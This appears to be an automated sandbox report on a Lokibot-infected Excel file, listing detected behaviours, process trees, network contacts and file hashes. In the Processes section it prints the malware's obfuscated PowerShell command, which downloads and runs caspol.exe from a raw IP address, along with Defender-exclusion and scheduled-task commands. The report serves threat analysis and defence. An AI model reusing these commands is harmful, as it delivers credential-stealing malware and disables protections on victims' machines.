Malware Analysis Report

2025-04-03 09:49

Sample ID 241121-kvtvjazfka
Target f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls
SHA256 f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d

Threat Level: Known bad

The file f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Process spawned unexpected child process

Lokibot

Lokibot family

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:55

Reported

2024-11-21 08:58

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2964 set thread context of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2712 wrote to memory of 2456 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2712 wrote to memory of 2456 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2712 wrote to memory of 2456 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2712 wrote to memory of 2456 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2456 wrote to memory of 2984 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 2984 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 2984 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 2984 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 2920 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2456 wrote to memory of 2920 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2456 wrote to memory of 2920 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2456 wrote to memory of 2920 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2920 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2920 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2920 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2920 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe

"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.1.254.170:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
GB 198.244.140.41:443 provit.uk tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 crl.microsoft.com udp
FR 23.15.179.154:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
RO 2.20.118.102:80 www.microsoft.com tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

memory/2308-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2308-1-0x000000007243D000-0x0000000072448000-memory.dmp

memory/2308-17-0x0000000002D20000-0x0000000002D22000-memory.dmp

memory/2712-16-0x0000000002060000-0x0000000002062000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

MD5 0b60282e9ddea43ca313d63ec56740ad
SHA1 e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a
SHA256 358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13
SHA512 ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

MD5 07495b0fdb6a3d3885aec8db9ff33bf7
SHA1 d9b06e201bba1af286cc8ebcf4b146929faf439b
SHA256 3d7fbd0e467e9a23b2fa90f47a7a44fda0efb1caf9b4ae7573ca778104a50e62
SHA512 200f82d25f2774dfed3a83366bbe1837feb0a2a9faa0c703f0a2fd7206a4879a6e5793ed7128260086bd69717479ab638efab740b63d4f5cb6505dc9b8366122

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 8948537a3d8cf6472968eaaa4d737bc7
SHA1 be0804f1dba8f2821fbfeb6086ba99133977d6ab
SHA256 85acea3f10c6eda76af7cf92e6a51d962be38db9eef1c3050941e09a1251a576
SHA512 ceab54352af50b7678f937e2370ba7b94efdf30b0af8797257fedc929bab892f3aa66451ce52b3804e6fa27e29354c76168fda2a7c125996f97fd66f716897df

C:\Users\Admin\AppData\Local\Temp\CabC6D8.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

MD5 50388b1f7dd763e374254a7cba6c8ec5
SHA1 6e6c486bc41a4bb1978c05585c01d2b8d9c60a5d
SHA256 7cc793038da07c244953d691f1206b00811817e1c623b582ef94276cecd6d77a
SHA512 0b2a143d563f62dd913de0ead3af93e27a9216758ae644d5dcf05d234d90771966ee27bc634c3749bf78a87d9656fa4f2b6e1547c4f260df08639136d11a8709

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d6d823d046675e6c32b4825035b0f4c6
SHA1 d815615054eb8a969449fae9019eec55aecdc1f5
SHA256 e5d81951dc9eba7cb82682e6d8a6855185a4a86f3d3eaed773d890a594d9573f
SHA512 fe401cc29e6c90e0320d74ec3e39adfe0e24a0f7a3b8f039171ec22849d69f2fb6abb55785aaf197f0a3947109559d638b61690acdf23c2e7ea1d42bcdc10232

\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline

MD5 c57bc8cdba00b7c06f649f8240a63731
SHA1 520a60648b730f63e2e8b6d982997ed806cdf9b3
SHA256 71e67c9a0696553812be4348b4a3797116fd185d88d2189d2b68786204239900
SHA512 f6c97bb1b61b67b0cb9e0e708df9e457d68c67643f9f04448297948fad7570c694c49af83486e40e491ac1511a36c31a3f2cc2af201fe72f022e886e51a95a2c

\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.0.cs

MD5 fe82050659a8b97690d60529499222c1
SHA1 7cc50135852b46dd1e36f2ff98506613db525a68
SHA256 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a
SHA512 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp

MD5 2b5b10ec04cd67d8945424bb16587308
SHA1 10238eed463047bcf2c316383d6f72e3eca14485
SHA256 f291752643b331119ed38f135b55d443e89a830869f96af62eee78124ee742f4
SHA512 f06ab9a0afa20dea09ac2a2c2c223d157ec8e42c294c9352f95037da68a95ba434fbc1ee146bd6db640a5f8d5d2ac6410b2a16e0a7e236024f9ada938867c34b

\??\c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp

MD5 a880c8b9bda21d20c8bf1b504fc8c17e
SHA1 49b3312c2b1047860334d71f596bc990fb7faeb4
SHA256 777f5f69471e7c6458b1bde2a47f64b3379d7c3ad2486c6fcd7cbf643eab0eb1
SHA512 227a3bf0235198e70ad25b2e1aadc8d8ca226487ad37ba9e7c99bdb7b34ca35877cba15d31c906c3203a1c4b8df85b4b3ad6b39bedbf57bebe47b4c1d21a2797

C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.dll

MD5 ec937630adcf8977be40884de3ec18e8
SHA1 c9d6bea53470543a1d8a9ea3de43e3eb2560d1e4
SHA256 b8995b4ee5e11d4c99a12fea932b741d89f484fa65855209b61eee88281e061f
SHA512 c5286de86e12d788e3d14264f09008252f1235f35ad6641a5f9f74653b98517713b3e02f147883f2767733079ead772fc0cc6e6e536716c42e046476537dfc98

C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.pdb

MD5 840cd591a20f611a1157774bb56a2b85
SHA1 087e28cc8c1ab176bc0231a744d86efb4ed19216
SHA256 17d1272995fe68d400161189eb4c101b4a3939650561992505a6b1ae24da2fc1
SHA512 80d8b2a0d0cb0777f63ec442c664be272d81bd1c818331dfe72a4170a5d869e23d9856b4bce48e6e910fa3f74e42cdd15359d97c1b63bdf65f63779039fb9267

memory/2308-60-0x000000007243D000-0x0000000072448000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 74061922f1e78c237a66d12a15a18181
SHA1 e31ee444aaa552a100f006e43f0810497a3b0387
SHA256 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c
SHA512 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

memory/2964-70-0x00000000001B0000-0x0000000000248000-memory.dmp

memory/2964-71-0x0000000000320000-0x0000000000332000-memory.dmp

memory/2964-72-0x0000000005290000-0x00000000052F4000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
